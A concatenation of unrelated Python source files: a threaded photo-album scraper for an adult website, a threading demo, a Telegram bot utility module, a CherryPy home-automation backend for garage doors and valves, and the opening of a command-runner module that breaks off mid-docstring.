# pornhub.com/albums/uncategorized?search=arg1&page=3
payload = {"search" : "", "page" : page_num}
categories = list()
for item in self.keywords:
if (item == "female"):
categories.append(item)
elif (item == "straight"):
categories.append(item)
elif (item == "misc"):
categories.append(item)
elif (item == "male"):
categories.append(item)
elif (item == "gay"):
categories.append(item)
else:
payload["search"] += (item + " ")
search_url = BASE_URL + ALBUMS_URL + "-".join(categories) + "?"
r = requests.get(search_url, params=payload, headers=HEADERS, proxies=self.ProxyDictionary)
html = r.text
return BeautifulSoup(html, "lxml")
def _scrapAlbumsURL(self, soup_data):
album_divs = soup_data.find_all("div", { "class" : "photoAlbumListBlock" } )
albums_url = list()
for album_div in album_divs:
for a_tag in album_div.find_all("a", href=True):
url = a_tag.attrs["href"]
if isAlbum(url):
albums_url.append(BASE_URL + url)
break
return albums_url
def _scrapPhotoFullURL(self, preview_url):
r = requests.get(preview_url, headers=HEADERS, proxies=self.ProxyDictionary)
html = r.text
soup = BeautifulSoup(html, "lxml")
for image in soup.find_all("img", src=True):
image_url = image.attrs["src"]
if isPhoto(image_url):
self.photos_queue.put(str(image_url))
return image_url
return False
def _scrapAlbumPhotos(self, album_url):
r = requests.get(album_url, headers=HEADERS, proxies=self.ProxyDictionary)
html = r.text
soup = BeautifulSoup(html, "lxml")
for possible_image in soup.find_all("a", href=True):
try:
preview_url = possible_image.attrs["href"]
if isPhotoPreview(preview_url):
yield (BASE_URL + preview_url)
except Exception as E:
pass
def getPhotos(self, quantity = 1, page = 1, infinity = False):
"""
Download photos.
:param quantity: number of photos to return
:param page: starting page number
:param infinity: never stop downloading
"""
quantity = quantity if quantity >= 1 else 1
page = page if page >= 1 else 1
found = 0
workers = list()
while True:
for album_url in self._scrapAlbumsURL(self._loadAlbumsPage(page)):
for preview_url in self._scrapAlbumPhotos(album_url):
worker = Thread(target=self._scrapPhotoFullURL, kwargs={"preview_url" : preview_url})
worker.start()
workers.append(worker)
while not self.photos_queue.empty():
if (found < quantity) or (infinity):
yield self.photos_queue.get()
found += 1
else:
raise StopIteration
if (len(workers)+1) % 4 == 0:
time.sleep(TIME_TO_WAIT)
page += 1
|
thread_demo.py
|
from threading import Thread, current_thread
def thread_test(name):
print("thread {} is running...".format(current_thread().name))
print("hello ", name)
print("thread {} ended".format(current_thread().name))
if __name__ == '__main__':
print("thread {} is running...".format(current_thread().name))
print("hello world")
t = Thread(target=thread_test, args=("test", ), name="TestThread")
t.start()
t.join()
print("thread {} ended".format(current_thread().name))
|
util.py
|
# -*- coding: utf-8 -*-
import random
import re
import string
import threading
import traceback
import warnings
from typing import Any, Callable, List, Dict, Optional, Union
# noinspection PyPep8Naming
import queue as Queue
import logging
from telebot import types
try:
import ujson as json
except ImportError:
import json
try:
# noinspection PyPackageRequirements
from PIL import Image
from io import BytesIO
pil_imported = True
except:
pil_imported = False
MAX_MESSAGE_LENGTH = 4096
logger = logging.getLogger('TeleBot')
thread_local = threading.local()
content_type_media = [
'text', 'audio', 'animation', 'document', 'photo', 'sticker', 'video', 'video_note', 'voice', 'contact', 'dice', 'poll',
'venue', 'location'
]
content_type_service = [
'new_chat_members', 'left_chat_member', 'new_chat_title', 'new_chat_photo', 'delete_chat_photo', 'group_chat_created',
'supergroup_chat_created', 'channel_chat_created', 'migrate_to_chat_id', 'migrate_from_chat_id', 'pinned_message',
'proximity_alert_triggered', 'voice_chat_scheduled', 'voice_chat_started', 'voice_chat_ended',
'voice_chat_participants_invited', 'message_auto_delete_timer_changed'
]
update_types = [
"update_id", "message", "edited_message", "channel_post", "edited_channel_post", "inline_query",
"chosen_inline_result", "callback_query", "shipping_query", "pre_checkout_query", "poll", "poll_answer",
"my_chat_member", "chat_member", "chat_join_request"
]
class WorkerThread(threading.Thread):
count = 0
def __init__(self, exception_callback=None, queue=None, name=None):
if not name:
name = "WorkerThread{0}".format(self.__class__.count + 1)
self.__class__.count += 1
if not queue:
queue = Queue.Queue()
threading.Thread.__init__(self, name=name)
self.queue = queue
self.daemon = True
self.received_task_event = threading.Event()
self.done_event = threading.Event()
self.exception_event = threading.Event()
self.continue_event = threading.Event()
self.exception_callback = exception_callback
self.exception_info = None
self._running = True
self.start()
def run(self):
while self._running:
try:
task, args, kwargs = self.queue.get(block=True, timeout=.5)
self.continue_event.clear()
self.received_task_event.clear()
self.done_event.clear()
self.exception_event.clear()
logger.debug("Received task")
self.received_task_event.set()
task(*args, **kwargs)
logger.debug("Task complete")
self.done_event.set()
except Queue.Empty:
pass
except Exception as e:
logger.debug(type(e).__name__ + " occurred, args=" + str(e.args) + "\n" + traceback.format_exc())
self.exception_info = e
self.exception_event.set()
if self.exception_callback:
self.exception_callback(self, self.exception_info)
self.continue_event.wait()
def put(self, task, *args, **kwargs):
self.queue.put((task, args, kwargs))
def raise_exceptions(self):
if self.exception_event.is_set():
raise self.exception_info
def clear_exceptions(self):
self.exception_event.clear()
self.continue_event.set()
def stop(self):
self._running = False
class ThreadPool:
def __init__(self, num_threads=2):
self.tasks = Queue.Queue()
self.workers = [WorkerThread(self.on_exception, self.tasks) for _ in range(num_threads)]
self.num_threads = num_threads
self.exception_event = threading.Event()
self.exception_info = None
def put(self, func, *args, **kwargs):
self.tasks.put((func, args, kwargs))
def on_exception(self, worker_thread, exc_info):
self.exception_info = exc_info
self.exception_event.set()
worker_thread.continue_event.set()
def raise_exceptions(self):
if self.exception_event.is_set():
raise self.exception_info
def clear_exceptions(self):
self.exception_event.clear()
def close(self):
for worker in self.workers:
worker.stop()
for worker in self.workers:
worker.join()
class AsyncTask:
def __init__(self, target, *args, **kwargs):
self.target = target
self.args = args
self.kwargs = kwargs
self.done = False
self.thread = threading.Thread(target=self._run)
self.thread.start()
def _run(self):
try:
self.result = self.target(*self.args, **self.kwargs)
except Exception as e:
self.result = e
self.done = True
def wait(self):
if not self.done:
self.thread.join()
if isinstance(self.result, BaseException):
raise self.result
else:
return self.result
class CustomRequestResponse():
def __init__(self, json_text, status_code = 200, reason = ""):
self.status_code = status_code
self.text = json_text
self.reason = reason
def json(self):
return json.loads(self.text)
def async_dec():
def decorator(fn):
def wrapper(*args, **kwargs):
return AsyncTask(fn, *args, **kwargs)
return wrapper
return decorator
def is_string(var):
return isinstance(var, str)
def is_dict(var):
return isinstance(var, dict)
def is_bytes(var):
return isinstance(var, bytes)
def is_pil_image(var):
return pil_imported and isinstance(var, Image.Image)
def pil_image_to_file(image, extension='JPEG', quality='web_low'):
if pil_imported:
photoBuffer = BytesIO()
image.convert('RGB').save(photoBuffer, extension, quality=quality)
photoBuffer.seek(0)
return photoBuffer
else:
raise RuntimeError('PIL module is not imported')
def is_command(text: str) -> bool:
"""
Checks if `text` is a command. Telegram chat commands start with the '/' character.
:param text: Text to check.
:return: True if `text` is a command, else False.
"""
if text is None: return False
return text.startswith('/')
def extract_command(text: str) -> Union[str, None]:
"""
Extracts the command from `text` (minus the '/') if `text` is a command (see is_command).
If `text` is not a command, this function returns None.
Examples:
extract_command('/help'): 'help'
extract_command('/help@BotName'): 'help'
extract_command('/search black eyed peas'): 'search'
extract_command('Good day to you'): None
:param text: String to extract the command from
:return: the command if `text` is a command (according to is_command), else None.
"""
if text is None: return None
return text.split()[0].split('@')[0][1:] if is_command(text) else None
def extract_arguments(text: str) -> str:
"""
Returns the argument after the command.
Examples:
extract_arguments("/get name"): 'name'
extract_arguments("/get"): ''
extract_arguments("/get@botName name"): 'name'
:param text: String to extract the arguments from a command
:return: the arguments if `text` is a command (according to is_command), else None.
"""
regexp = re.compile(r"/\w*(@\w*)*\s*([\s\S]*)", re.IGNORECASE)
result = regexp.match(text)
return result.group(2) if is_command(text) else None
def split_string(text: str, chars_per_string: int) -> List[str]:
"""
Splits one string into multiple strings, with a maximum amount of `chars_per_string` characters per string.
This is very useful for splitting one giant message into multiples.
:param text: The text to split
:param chars_per_string: The number of characters per line the text is split into.
:return: The splitted text as a list of strings.
"""
return [text[i:i + chars_per_string] for i in range(0, len(text), chars_per_string)]
def smart_split(text: str, chars_per_string: int=MAX_MESSAGE_LENGTH) -> List[str]:
"""
Splits one string into multiple strings, with a maximum amount of `chars_per_string` characters per string.
This is very useful for splitting one giant message into multiples.
If `chars_per_string` > 4096: `chars_per_string` = 4096.
Splits by '\n', '. ' or ' ' in exactly this priority.
:param text: The text to split
:param chars_per_string: The number of maximum characters per part the text is split to.
:return: The splitted text as a list of strings.
"""
def _text_before_last(substr: str) -> str:
return substr.join(part.split(substr)[:-1]) + substr
if chars_per_string > MAX_MESSAGE_LENGTH: chars_per_string = MAX_MESSAGE_LENGTH
parts = []
while True:
if len(text) < chars_per_string:
parts.append(text)
return parts
part = text[:chars_per_string]
if "\n" in part: part = _text_before_last("\n")
elif ". " in part: part = _text_before_last(". ")
elif " " in part: part = _text_before_last(" ")
parts.append(part)
text = text[len(part):]
def escape(text: str) -> str:
"""
Replaces the following chars in `text` ('&' with '&', '<' with '<' and '>' with '>').
:param text: the text to escape
:return: the escaped text
"""
chars = {"&": "&", "<": "<", ">": ">"}
for old, new in chars.items(): text = text.replace(old, new)
return text
def user_link(user: types.User, include_id: bool=False) -> str:
"""
Returns an HTML user link. This is useful for reports.
Attention: Don't forget to set parse_mode to 'HTML'!
Example:
bot.send_message(your_user_id, user_link(message.from_user) + ' started the bot!', parse_mode='HTML')
:param user: the user (not the user_id)
:param include_id: include the user_id
:return: HTML user link
"""
name = escape(user.first_name)
return (f"<a href='tg://user?id={user.id}'>{name}</a>"
+ (f" (<pre>{user.id}</pre>)" if include_id else ""))
def quick_markup(values: Dict[str, Dict[str, Any]], row_width: int=2) -> types.InlineKeyboardMarkup:
"""
Returns a reply markup from a dict in this format: {'text': kwargs}
This is useful to avoid always typing 'btn1 = InlineKeyboardButton(...)' 'btn2 = InlineKeyboardButton(...)'
Example:
quick_markup({
'Twitter': {'url': 'https://twitter.com'},
'Facebook': {'url': 'https://facebook.com'},
'Back': {'callback_data': 'whatever'}
}, row_width=2):
returns an InlineKeyboardMarkup with two buttons in a row, one leading to Twitter, the other to facebook
and a back button below
kwargs can be:
{
'url': None,
'callback_data': None,
'switch_inline_query': None,
'switch_inline_query_current_chat': None,
'callback_game': None,
'pay': None,
'login_url': None
}
:param values: a dict containing all buttons to create in this format: {text: kwargs} {str:}
:param row_width: int row width
:return: InlineKeyboardMarkup
"""
markup = types.InlineKeyboardMarkup(row_width=row_width)
buttons = [
types.InlineKeyboardButton(text=text, **kwargs)
for text, kwargs in values.items()
]
markup.add(*buttons)
return markup
# CREDITS TO http://stackoverflow.com/questions/12317940#answer-12320352
def or_set(self):
self._set()
self.changed()
def or_clear(self):
self._clear()
self.changed()
def orify(e, changed_callback):
if not hasattr(e, "_set"):
e._set = e.set
if not hasattr(e, "_clear"):
e._clear = e.clear
e.changed = changed_callback
e.set = lambda: or_set(e)
e.clear = lambda: or_clear(e)
def OrEvent(*events):
or_event = threading.Event()
def changed():
bools = [ev.is_set() for ev in events]
if any(bools):
or_event.set()
else:
or_event.clear()
def busy_wait():
while not or_event.is_set():
or_event._wait(3)
for e in events:
orify(e, changed)
or_event._wait = or_event.wait
or_event.wait = busy_wait
changed()
return or_event
def per_thread(key, construct_value, reset=False):
if reset or not hasattr(thread_local, key):
value = construct_value()
setattr(thread_local, key, value)
return getattr(thread_local, key)
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
# https://stackoverflow.com/a/312464/9935473
for i in range(0, len(lst), n):
yield lst[i:i + n]
def generate_random_token():
return ''.join(random.sample(string.ascii_letters, 16))
def deprecated(warn: bool=True, alternative: Optional[Callable]=None):
"""
Use this decorator to mark functions as deprecated.
When the function is used, an info (or warning if `warn` is True) is logged.
:param warn: If True a warning is logged else an info
:param alternative: The new function to use instead
"""
def decorator(function):
def wrapper(*args, **kwargs):
info = f"`{function.__name__}` is deprecated." + (f" Use `{alternative.__name__}` instead" if alternative else "")
if not warn:
logger.info(info)
else:
logger.warning(info)
return function(*args, **kwargs)
return wrapper
return decorator
# Cloud helpers
def webhook_google_functions(bot, request):
"""A webhook endpoint for Google Cloud Functions FaaS."""
if request.is_json:
try:
request_json = request.get_json()
update = types.Update.de_json(request_json)
bot.process_new_updates([update])
return ''
except Exception as e:
print(e)
return 'Bot FAIL', 400
else:
return 'Bot ON'
def antiflood(function, *args, **kwargs):
"""
Use this function inside loops in order to avoid getting TooManyRequests error.
Example:
from telebot.util import antiflood
for chat_id in chat_id_list:
msg = antiflood(bot.send_message, chat_id, text)
You want get the
"""
from telebot.apihelper import ApiTelegramException
from time import sleep
msg = None
try:
msg = function(*args, **kwargs)
except ApiTelegramException as ex:
if ex.error_code == 429:
sleep(ex.result_json['parameters']['retry_after'])
msg = function(*args, **kwargs)
finally:
return msg
|
mitzonURLCmdProcessor.py
|
import logging
import logging.handlers
import logging.config
import sys, traceback
import cherrypy
# try:
from cheroot.wsgi import Server as WSGIServer
# except ImportError:
#from cherrypy.wsgiserver import CherryPyWSGIServer as WSGIServer
from MitzonBackend.Sensor import Sensor
from MitzonBackend.Constants import *
from MitzonBackend.CommandQResponse import *
from MitzonBackend.ConfigManager import ConfigManager
from MitzonBackend.GarageDoor import GarageDoor
from MitzonBackend.AlertManager import AlertManager
from MitzonBackend.DeviceManager import DeviceManager
from MitzonBackend.GarageManager import GarageManager
from MitzonBackend.ValveManager import ValveManager
from MitzonBackend.WeatherManager import WeatherManager
from MitzonBackend.NotificationManager import NotificationManager
from queue import *
from threading import Thread
from MitzonBackend.SingletonMeta import SingletonMeta
import types
from time import sleep
import time
import datetime
import json
log = logging.getLogger('Garage.mitzonURLCmdProcessor')
garage_manager_handler = None #GarageManager()
valve_manager_handler = None #ValveManager()
weather_manager_handler = None #WeatherManager()
notification_manager_handler = None
@cherrypy.expose
class mitzonURLCmdProcessor(metaclass=SingletonMeta):
def __init__(self, dispatch: Queue):
log.debug("init mitzonURLCmdProcessor...")
#self.deviceList = {}
self.dispatch = dispatch
# Read Building Config
'''Create new device hanlder and connect to USB port for arduino'''
self.config_handler = ConfigManager()
self.config_handler.setConfigFileName("config/mitzon_backend.config")
self.dev_manager_handler = DeviceManager()
self.alert_manager_handler = AlertManager()
self.NBR_QUEUE=2
self.server_socket_host =self.config_handler.getConfigParam("SECURITY", "SERVER_SOCKET_HOST")
self.server_socket_port = int(self.config_handler.getConfigParam("SECURITY", "SERVER_SOCKET_PORT"))
self.server_ssl_module = self.config_handler.getConfigParam("SECURITY", "SERVER_SSL_MODULE")
self.server_ssl_certificate = self.config_handler.getConfigParam("SECURITY", "SERVER_SSL_CERTIFICATE")
self.server_ssl_private_key = self.config_handler.getConfigParam("SECURITY", "SERVER_SSL_PRIVATE_KEY")
@cherrypy.tools.accept(media='text/plain')
# s.post('http://127.0.0.1:8080/garage/open/g0')
def _cp_dispatch(self, vpath):
try:
debugstr = ("Received vpath=%s len=%d" % (vpath, len(vpath)))
log.debug(debugstr)
if len(vpath) == 1:
cherrypy.request.params['mything'] = vpath.pop() # ex: garage_door
return self
if len(vpath) == 3:
cherrypy.request.params['mything'] = vpath.pop(0) # /myid/
cherrypy.request.params['myservice'] = vpath.pop(0) # ex: open close
cherrypy.request.params['myid'] = vpath.pop(0) # which one 0, 1, 2...
return self
except Exception:
log.error("_cp_dispatch error in garageURL...")
traceback.print_exc()
os._exit(-1)
return vpath
# @cherrypy.expose
def GET(self):
log.info("Garage Request Received GET")
return cherrypy.session['mything']
@cherrypy.popargs('myservice')
@cherrypy.popargs('myid')
# @cherrypy.expose
def POST(self, mything, myservice=None, myid=None):
cherrypy.session['mything'] = mything
cherrypy.session['myservice'] = myservice
cherrypy.session['myid'] = myid
cherrypy.response.headers["Access-Control-Allow-Origin"] = "*"
cherrypy.response.headers["Allow"] = "POST, GET, OPTIONS, DELETE, PUT, PATCH"
caller = cherrypy.request.remote.ip
logbuf = "MitzonBackend Request Received POST: %s %s %s " % (mything, myservice, myid)
log.debug(logbuf)
## Test Arduino Device
# self.dispatch.put(('testConnection',"msg Hard coded pin"))
## Send all html POST commands to device through device manager
self.dispatch.put(('processDeviceCommand', mything, myservice, myid))
resp_str=""
resp_array = {}
sub_nbr=0
loopstarttime=time.time()
# for sub_nbr in range(0,2): # 1 only DeviceManager 2 Subscribers are DeviceManager and Alert Manager. Not
while response_queue.qsize()>0 or ( sub_nbr<self.NBR_QUEUE and (time.time()<(loopstarttime+float(self.config_handler.getConfigParam("THREAD_CONTROL","RESP_TIMEOUT")))) ):
try:
resp=response_queue.get(True, float(self.config_handler.getConfigParam("THREAD_CONTROL","RESP_TIMEOUT")))
resp_str = resp_str + resp.getRspPropsToString()+" "
resp_array[sub_nbr]=resp.getRspPropsToArray()
sub_nbr+=1
except Empty:
log.error("response_queue RESP_TIMEOUT=%s/%s/%s" %(mything, myservice, myid))
# resp_str=resp_str + ("RESP_TIMEOUT=%s/%s/%s" %(mything, myservice, myid))
resp_str=resp_str[:-1] #remove Trailing space
# resp_str += self.alert_manager_handler.status().getRspPropsToString()
if log.isEnabledFor(logging.DEBUG):
self.dev_manager_handler.listDevices()
resp_json=json.dumps(resp_array)
# Uncomment return statement below.
return resp_json
#return resp_str
# @cherrypy.expose
def PUT(self):
cherrypy.session['myservice'] = self.myservice
logbuf = "Garage Request Received PUT:"
log.info(logbuf)
DeviceManager.listDevices(self.deviceList)
# @cherrypy.expose
def DELETE(self):
cherrypy.session.pop('myservice', None)
''' Outside Class'''
# @cherrypy.expose
def command_queue_fn(q: Queue, r: Queue):
next = q.get()
while next is not None:
# log.info(next[0] +'/' + next[1:])
resp=next[0](*(next[1:]))
if log.isEnabledFor(logging.DEBUG):
log.debug("command_queue_fn isinstance next = %s", next[0].__self__.__class__.__name__)
if next[0].__self__.__class__.__name__ == "DeviceManager":
r.put(resp)
elif next[0].__self__.__class__.__name__ == "AlertManager":
r.put(resp)
if log.isEnabledFor(logging.DEBUG):
# log.debug("command_queue_fn NOT ADDED TO QUEUE isinstance next = %s",
log.debug("command_queue_fn ADDED TO QUEUE isinstance next = %s",
next[0].__self__.__class__.__name__)
else:
log.error("Unknown class %s" % (next[0].__self__.__class__.__name__))
traceback.print_exc()
os._exit(-1)
next = q.get()
# @cherrypy.expose
def dispatcher_fn(dispatch: Queue, command: Queue, subscribers: list):
next = dispatch.get()
while next is not None:
name = next[0]
args = next[1:]
# log.info('dispatcher_fn name=' + getattr(sub, str(name)) + ' args=' + list(args) )
for sub in subscribers:
try:
#log.debug('dispatcher_fn name= ' + name + 'args=' + args[0] )
command.put(([getattr(sub, str(name))] + list(args)))
except AttributeError as exc:
log.error("dispatcher_fn fn:'%s' arg:'%s'" % (name, args[0]))
log.error(traceback.extract_statck())
pass
next = dispatch.get()
if __name__ == '__main__':
"""
References:
[LUH] https://www.owasp.org/index.php/List_of_useful_HTTP_headers
[XFO] https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
[CSP] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#Bonus_Rule_.232:_Implement_Content_Security_Policy
"""
_csp_sources = ['default', 'script', 'style', 'img', 'connect', 'font', 'object', 'media', 'frame']
_csp_default_source = "'self'"
_csp_rules = list()
for c in _csp_sources:
_csp_rules.append('{:s}-src {:s}'.format(c, _csp_default_source))
_csp = '; '.join(_csp_rules)
dispatch_queue = Queue()
garageHandler = mitzonURLCmdProcessor(dispatch_queue)
# ''' @TODO Hardcoded RotatingFileHandler '''
# logrotate_handler=logging.handlers.RotatingFileHandler("log/mitzon.log",maxBytes=10485760,backupCount=20,encoding=None, delay=0)
# logging.basicConfig(level=logging.INFO,
# format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
# handlers=[logrotate_handler,
# logging.StreamHandler()])
#
# logrotate_handler.doRollover() #Roolover logs on startup
server_config = {
'server.socket_host': garageHandler.server_socket_host,
'server.socket_port': garageHandler.server_socket_port,
'server.ssl_module': garageHandler.server_ssl_module,
#'server.ssl_module': 'pyopenssl',
'server.ssl_certificate': garageHandler.server_ssl_certificate,
'server.ssl_private_key': garageHandler.server_ssl_private_key,
'tools.response_headers.on': False,
'tools.response_headers.headers': [('Content-Type', 'text/plain'),
('Strict-Transport-Security', 'max-age=31536000'),
('X-Frame-Options', 'DENY'), # [XFO]
('X-XSS-Protection', '1; mode=block'), # [LUH]
('Content-Security-Policy', _csp), # [CSP]
('X-Content-Security-Policy', _csp), # [CSP]
('X-Webkit-CSP', _csp), # [CSP]
('X-Content-Type-Options', 'nosniff') # [LUH]
],
'tools.sessions.secure': True,
'tools.request_headers.on': False,
'tools.staticdir.on': True,
'tools.staticdir.dir': "log",
# 'log.access_file': 'log/garage_cherrypy_access.log',
# 'log.error_file': 'log/garage_cherrypy_error.log',
# 'log.screen': True,
# 'tools.sessions.on': True,
'engine.autoreload_on': False,
}
garage_backend_conf = {
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.sessions.on': True,
'tools.response_headers.on': False,
'tools.response_headers.headers': [('Content-Type', 'text/plain')],
}
}
LOG_CONF = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'void': {
'format': 'void %(asctime)s %(name)s: %(message)s'
},
'standard': {
'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s'
},
},
'handlers': {
'Garage': { #{"log/mitzon.log", maxBytes=, backupCount=20, encoding=None,delay=0, logging.handlers.RotatingFileHandler
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.FileHandler"),
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'standard',
'filename': 'log/mitzon.log',
'maxBytes': 104857600,
'backupCount': 20,
'encoding': 'utf8'
},
'cherrypy_console': {
'level': 'INFO',
'class': 'logging.StreamHandler',
'formatter': 'standard',
'stream': 'ext://sys.stdout'
},
'cherrypy_access': {
'level': 'INFO',
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'standard',
'filename': 'log/garage_cherrypy_access.log',
'maxBytes': 10485760,
'backupCount': 10,
'encoding': 'utf8'
},
'cherrypy_error': {
'level': 'INFO',
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'standard',
'filename': 'log/garage_cherrypy_error.log',
'maxBytes': 10485760,
'backupCount': 10,
'encoding': 'utf8'
},
},
'loggers': {
'Garage.AlertManager': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.AlertManager"),
'propagate': True
},
'Garage.ConfigManager': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.ConfigManager"),
'propagate': True
},
'Garage.DeviceManager': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.DeviceManager"),
'propagate': True
},
'Garage.GarageDoor': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.GarageDoor"),
'propagate': True
},
'Garage.GarageManager': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.GarageManager"),
'propagate': True
},
'Valve.Valve': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Valve.Valve"),
'propagate': True
},
'Valve.ValveManager': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Valve.ValveManager"),
'propagate': True
},
'Garage.Light': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.Light"),
'propagate': True
},
'Garage.NotificationManager': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.NotificationManager"),
'propagate': True
},
'Garage.Sensor': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.Sensor"),
'propagate': True
},
'Garage.mitzonURLCmdProcessor': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.mitzonURLCmdProcessor"),
'propagate': True
},
'Weather.WeatherManager': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Weather.WeatherManager"),
'propagate': True
},
'nanpy': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "nanpy"),
'propagate': True
},
'nanpy.serialmanager': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "nanpy.serialmanager"),
'propagate': True
},
# # Only Log Request and reponses to file. Screen is the next block!
'cherrypy.access': {
'handlers': ['cherrypy_access'],
'level': 'INFO',
'propagate': False
},
# # Log Requests to screen
# 'cherrypy.access': {
# 'handlers': ['cherrypy_console', 'cherrypy_access'],
# 'level': 'INFO',
# 'propagate': False
# },
'cherrypy.error': {
'handlers': ['cherrypy_console', 'cherrypy_error'],
'level': 'INFO',
'propagate': False
},
}
}
logging.config.dictConfig(LOG_CONF)
# Say starting and force a log rotation
log=logging.getLogger('Mitzon.mitzonURLCmdProcessor')
logh=logging._handlers.get('Garage')
logh.doRollover()
log.info("Starting Mitzon...")
'''Subscriber - Dispatcher '''
command_queue = Queue()
response_queue = Queue()
try:
cherrypy.config.update(server_config)
# dispatch_queue = Queue()
# garageHandler = mitzonURLCmdProcessor(dispatch_queue)
# pub1 = Pub1(dispatch_queue)
sub1 = DeviceManager()
sub2 = AlertManager()
thread_command_queue = Thread(target=command_queue_fn, name='cmd_queue', args=(command_queue,response_queue,))
thread_dispatcher = Thread(target=dispatcher_fn, name='dispath_queue',
args=(dispatch_queue, command_queue, [sub1, sub2]))
garage_manager_handler = GarageManager()
thread_garage_manager = Thread(target=GarageManager.monitor,
args=(garage_manager_handler,), name='garage_manager',
daemon=True)
mitzon_valve_handler = ValveManager()
thread_valve_manager = Thread(target=ValveManager.monitor,
args=(mitzon_valve_handler,), name='valve_manager',
daemon=True)
mitzon_weather_handler = WeatherManager()
thread_weather_manager = Thread(target=WeatherManager.monitor,
args=(mitzon_weather_handler,), name='weather_manager',
daemon=True)
notification_manager_handler = NotificationManager()
thread_notification_manager = Thread(target=NotificationManager.processnotif,
args=(notification_manager_handler,), name='notification_manager',
daemon=True)
thread_command_queue.start()
thread_dispatcher.start()
thread_garage_manager.start()
thread_valve_manager.start()
thread_weather_manager.start()
thread_notification_manager.start()
cherrypy.quickstart(garageHandler, '/',garage_backend_conf)
except Exception:
log.error("Cherrypy quickstart fail !")
traceback.print_exc()
os._exit(-1)
dispatch_queue.put(None)
command_queue.put(None)
# thread_command_queue.join(THREAD_TIMEOUTS)
# thread_dispatcher.join(THREAD_TIMEOUTS)
# thread_garage_manager.join(THREAD_TIMEOUTS)
cherrypy.engine.exit()
os._exit(0)
|
runners.py
|
# -*- coding: utf-8 -*-
import locale
import os
import struct
from subprocess import Popen, PIPE
import sys
import threading
import time
from .util import six
# Import some platform-specific things at top level so they can be mocked for
# tests.
try:
import pty
except ImportError:
pty = None
try:
import fcntl
except ImportError:
fcntl = None
try:
import termios
except ImportError:
termios = None
from .exceptions import (
UnexpectedExit, Failure, ThreadException, WatcherError,
)
from .platform import (
WINDOWS, pty_size, character_buffered, ready_for_reading, bytes_to_read,
)
from .util import has_fileno, isatty, ExceptionHandlingThread, encode_output
class Runner(object):
"""
Partially-abstract core command-running API.
This class is not usable by itself and must be subclassed, implementing a
number of methods such as `start`, `wait` and `returncode`. For a subclass
implementation example, see the source code for `.Local`.
"""
read_chunk_size = 1000
input_sleep = 0.01
def __init__(self, context):
"""
Create a new runner with a handle on some `.Context`.
:param context:
a `.Context` instance, used to transmit default options and provide
access to other contextualized information (e.g. a remote-oriented
`.Runner` might want a `.Context` subclass holding info about
hostnames and ports.)
.. note::
The `.Context` given to `.Runner` instances **must** contain
default config values for the `.Runner` class in question. At a
minimum, this means values for each of the default
`.Runner.run` keyword arguments such as ``echo`` and ``warn``.
:raises exceptions.ValueError:
if not all expected default values are found in ``context``.
"""
#: The `.Context` given to the same-named argument of `__init__`.
self.context = context
#: A `threading.Event` signaling program completion.
#:
#: Typically set after `wait` returns. Some IO mechanisms rely on this
#: to know when to exit an infinite read loop.
self.program_finished = threading.Event()
# I wish Sphinx would organize all class/instance attrs in the same
# place. If I don't do this here, it goes 'class vars -> __init__
# docstring -> instance vars' :( TODO: consider just merging class and
# __init__ docstrings, though that's annoying too.
#: How many bytes (at maximum) to read per iteration of stream reads.
self.read_chunk_size = self.__class__.read_chunk_size
# Ditto re: declaring this in 2 places for doc reasons.
#: How many seconds to sleep on each iteration of the stdin read loop
#: and other otherwise-fast loops.
self.input_sleep = self.__class__.input_sleep
#: Whether pty fallback warning has been emitted.
self.warned_about_pty_fallback = False
#: A list of `.StreamWatcher` instances for use by `respond`. Is filled
#: in at runtime by `run`.
self.watchers = []
def run(self, command, **kwargs):
"""
Execute ``command``, returning an instance of `Result`.
.. note::
All kwargs will default to the values found in this instance's
`~.Runner.context` attribute, specifically in its configuration's
``run`` subtree (e.g. ``run.echo`` provides the default value for
the ``echo`` keyword, etc). The base default values are described
in the parameter list below.
:param str command: The shell command to execute.
:param str shell:
Which shell binary to use. Default: ``/bin/bash`` (on Unix;
``COMSPEC`` or ``cmd.exe`` on Windows.)
:param bool warn:
Whether to warn and continue, instead of raising
`.UnexpectedExit`, when the executed command exits with a
nonzero status. Default: ``False``.
.. note::
This setting has no effect on exceptions, which will still be
raised, typically bundled in `.ThreadException` objects if they
were raised by the IO worker threads.
Similarly, `.WatcherError` exceptions raised by
`.StreamWatcher` instances will also ignore this setting, and
will usually be bundled inside `.Failure` objects (in order to
preserve the execution context).
:param hide:
